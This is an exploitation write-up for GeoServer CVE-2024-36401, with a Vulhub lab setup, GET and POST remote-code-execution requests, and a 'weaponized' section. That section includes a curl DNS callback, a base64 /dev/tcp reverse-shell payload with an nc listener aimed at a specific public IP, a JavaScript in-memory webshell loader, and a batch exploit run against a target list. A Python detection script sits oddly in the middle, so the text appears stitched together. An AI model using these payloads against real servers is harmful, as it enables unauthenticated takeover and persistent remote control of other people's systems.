GeoServer CVE-2024-36401 Exploitation

Search syntax

app.name="GeoServer" and ip.country="CN" and icp.is_exception="true"

Affected versions

In GeoServer 2.25.1, 2.24.3, 2.23.5 and earlier, an unauthenticated user can send a crafted OGC request that makes a default installation evaluate an XPath expression, and then abuse functionality exposed by Apache Commons JXPath to execute arbitrary code. GeoServer is a J2EE implementation of the OpenGIS Web Server specification; it makes publishing map data straightforward and lets users update, delete and insert feature data.

Lab environment

A cloud server in a US region is recommended, since it makes pulling from GitHub and Vulhub easier.

git clone https://github.com/vulhub/vulhub.git
cd vulhub/
cd geoserver/CVE-2024-36401/
docker-compose up -d

Visit http://your-ip:8080/geoserver and you will see the default GeoServer page.

POC

GET-based POC

GET /geoserver/wfs?service=WFS&version=2.0.0&request=GetPropertyValue&typeNames=sf:archsites&valueReference=exec(java.lang.Runtime.getRuntime(),'touch%20/tmp/success1') HTTP/1.1
Host: your-ip:8080
Accept-Encoding: gzip, deflate, br
Accept: */*
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.6367.118 Safari/537.36
Connection: close
Cache-Control: max-age=0

Enter the container and check: the file has been created successfully.

docker exec -it cve-2024-36401_web_1 /bin/bash
ls /tmp

POST-based POC

POST /geoserver/wfs HTTP/1.1
Host: your-ip:8080
Accept-Encoding: gzip, deflate, br
Accept: */*
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.6367.118 Safari/537.36
Connection: close
Cache-Control: max-age=0
Content-Type: application/xml
Content-Length: 356

<wfs:GetPropertyValue service='WFS' version='2.0.0'
 xmlns:topp='http://www.openplans.org/topp'
 xmlns:fes='http://www.opengis.net/fes/2.0'
 xmlns:wfs='http://www.opengis.net/wfs/2.0'>
  <wfs:Query typeNames='sf:archsites'/>
  <wfs:valueReference>exec(java.lang.Runtime.getRuntime(),'touch /tmp/success2')</wfs:valueReference>
</wfs:GetPropertyValue>

Only a response whose ows:ExceptionReport error reads java.lang.ClassCastException: indicates that the command actually executed.

Note that typeNames must refer to an existing type; all Types on the target server can be found in the web UI.
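The GET and POST forms above differ only in where the valueReference travels (query string versus XML body), so a defender can cover both with one check over request logs. The following Python is an added example for detection and is not part of this post or of GeoServer; the sample requests are constructed to mirror the shape of the requests shown above, and the function names are hypothetical.

```python
"""Flag CVE-2024-36401-style JXPath injection in GeoServer WFS requests.

A legitimate WFS GetPropertyValue valueReference is an XPath property
name such as sf:the_geom. JXPath extension-function calls (exec, eval,
getEngineByName) or Java class references in that field are the
signature of the exploitation pattern discussed on this page.
"""
import re
from urllib.parse import parse_qs, urlsplit

# Constructed sample traffic (method, request target, body) -- not real logs.
SAMPLE_REQUESTS = [
    ("GET",
     "/geoserver/wfs?service=WFS&version=2.0.0&request=GetPropertyValue"
     "&typeNames=sf:archsites&valueReference=exec(java.lang.Runtime.getRuntime(),'id')",
     ""),
    ("POST", "/geoserver/wfs",
     "<wfs:GetPropertyValue service='WFS' version='2.0.0'>"
     "<wfs:Query typeNames='sf:archsites'/>"
     "<wfs:valueReference>exec(java.lang.Runtime.getRuntime(),'id')</wfs:valueReference>"
     "</wfs:GetPropertyValue>"),
    ("GET",  # benign request: a plain property name
     "/geoserver/wfs?service=WFS&version=2.0.0&request=GetPropertyValue"
     "&typeNames=sf:archsites&valueReference=sf:the_geom",
     ""),
    ("POST", "/geoserver/wfs",
     "<wfs:GetPropertyValue><wfs:Query typeNames='sf:archsites'/>"
     "<wfs:valueReference>eval(getEngineByName(javax.script.ScriptEngineManager.new(),'js'),'x')"
     "</wfs:valueReference></wfs:GetPropertyValue>"),
]

# Indicators taken from the request patterns shown on this page.
SUSPICIOUS = re.compile(
    r"""
    \b(?:exec|eval|getEngineByName)\s*\(   # JXPath extension-function calls
  | \bjava\.lang\.Runtime\b                # direct Runtime access
  | \bjavax\.script\.ScriptEngineManager\b # script-engine bootstrap
    """,
    re.VERBOSE | re.IGNORECASE,
)

_XML_VALUE_REF = re.compile(
    r"<(?:\w+:)?valueReference>(.*?)</(?:\w+:)?valueReference>", re.S)


def extract_value_references(method, target, body):
    """Return every valueReference carried by one request.

    GET: query parameter (parse_qs URL-decodes, so %20 etc. are handled).
    POST: <wfs:valueReference> elements in the XML body.
    """
    refs = []
    if method.upper() == "GET":
        for key, values in parse_qs(urlsplit(target).query,
                                    keep_blank_values=True).items():
            if key.lower() == "valuereference":  # OGC parameter names are case-insensitive
                refs.extend(values)
    else:
        refs.extend(_XML_VALUE_REF.findall(body))
    return refs


def is_jxpath_injection(value_reference):
    """True when a valueReference looks like code rather than a property name."""
    return SUSPICIOUS.search(value_reference) is not None


def scan(requests):
    """Return (method, valueReference) for every request that matches."""
    alerts = []
    for method, target, body in requests:
        for ref in extract_value_references(method, target, body):
            if is_jxpath_injection(ref):
                alerts.append((method, ref))
    return alerts


if __name__ == "__main__":
    for method, ref in scan(SAMPLE_REQUESTS):
        print(f"ALERT {method}: {ref}")
```

Running it reports the two exec() requests and the eval/getEngineByName request, while the benign sf:the_geom lookup is left alone. In a real deployment the same `scan` logic would be fed from the access log or a WAF tap in front of /geoserver/wfs; the body-side check matters because the GET variant is the only one that shows up in a plain access log.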

DNS callback test

POST /geoserver/wfs HTTP/1.1
Host: 47.251.97.142:8080
Accept-Encoding: gzip, deflate, br
Accept: */*
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.6367.118 Safari/537.36
Connection: close
Cache-Control: max-age=0
Content-Type: application/xml
Content-Length: 358

<wfs:GetPropertyValue service='WFS' version='2.0.0'
 xmlns:topp='http://www.openplans.org/topp'
 xmlns:fes='http://www.opengis.net/fes/2.0'
 xmlns:wfs='http://www.opengis.net/wfs/2.0'>
  <wfs:Query typeNames='sf:archsites'/>
  <wfs:valueReference>exec(java.lang.Runtime.getRuntime(),'curl 5s1mc4.dnslog.cn')</wfs:valueReference>
</wfs:GetPropertyValue>

Weaponized exploitation

Reverse shell

An online reverse shell generator can produce the one-line reverse shell command.

echo "sh -i >& /dev/tcp/攻击机ip/攻击机端口 0>&1" |base64
nc -lvnp 7777 # start the listener on the attacker machine

POST /geoserver/wfs HTTP/1.1
Host: 47.251.97.142:8080
Accept-Encoding: gzip, deflate, br
Accept: */*
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.6367.118 Safari/537.36
Connection: close
Cache-Control: max-age=0
Content-Type: application/xml
Content-Length: 432

<wfs:GetPropertyValue service='WFS' version='2.0.0'
 xmlns:topp='http://www.openplans.org/topp'
 xmlns:fes='http://www.opengis.net/fes/2.0'
 xmlns:wfs='http://www.opengis.net/wfs/2.0'>
  <wfs:Query typeNames='sf:archsites'/>
  <wfs:valueReference>exec(java.lang.Runtime.getRuntime(),'bash -c {echo,反弹的base64编码}|{base64,-d}|{bash,-i}')</wfs:valueReference>
</wfs:GetPropertyValue>

Note that the number in Content-Length: 357 must be equal to or greater than the byte length of the body for the command to execute; the larger it is, the slower the execution.

Injecting an in-memory shell

Use the JMG tool to generate the memory shell; note that the name must be written as java.lang.tes, set a custom password and key, and click generate. Copy the output into the str=""; slot (the memory shell's base64) in the POC below.

POST /geoserver/wfs HTTP/1.1
Host: 47.251.97.142:8080
Accept-Encoding: gzip,deflate,br
Accept: */*
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.6367.118 Safari/537.36
Connection: close
Cache-Control: max-age=0
Content-Type: application/xml
Content-Length: 432

<wfs:GetPropertyValue service='WFS' version='2.0.0'
 xmlns:topp='http://www.openplans.org/topp'
 xmlns:fes='http://www.opengis.net/fes/2.0'
 xmlns:wfs='http://www.opengis.net/wfs/2.0'>
  <wfs:Query typeNames='sf:archsites'/>
  <wfs:valueReference>eval(getEngineByName(javax.script.ScriptEngineManager.new(),'js'),'
var str="";
var bt;
try {
    bt = java.lang.Class.forName("sun.misc.BASE64Decoder").newInstance().decodeBuffer(str);
} catch (e) {
    bt = java.util.Base64.getDecoder().decode(str);
}
var theUnsafe = java.lang.Class.forName("sun.misc.Unsafe").getDeclaredField("theUnsafe");
theUnsafe.setAccessible(true);
unsafe = theUnsafe.get(null);
unsafe.defineAnonymousClass(java.lang.Class.forName("java.lang.Class"), bt, null).newInstance();
')</wfs:valueReference>
</wfs:GetPropertyValue>

This POC has problems and does not succeed; it is recommended to obtain a reverse shell first and then use other tooling to establish a probe for control.

Batch detection tool

git clone https://mirror.ghproxy.com/https://github.com/RevoltSecurities/CVE-2024-36401.git
cd CVE-2024-36401/
pip install -r requirements.txt -i https://pypi.tuna.tsinghua.edu.cn/simple
python exploit.py -l geoserverip.txt

References
https://mp.weixin.qq.com/s/h4oswTGGaxVBLXR_h7PT1Q
https://cloud.tencent.com/developer/article/2437213
https://github.com/vulhub/vulhub/blob/master/geoserver/CVE-2024-36401/README.zh-cn.md
https://github.com/pen4uin/java-memshell-generator
https://xz.aliyun.com/t/14991?time__1311=GqAh0IqGxmxfx0v44%2BxCqqQwwbugt03x
https://github.com/RevoltSecurities/CVE-2024-36401
https://yzddmr6.com/posts/geoserver-memoryshell/
https://cn-sec.com/archives/2997415.html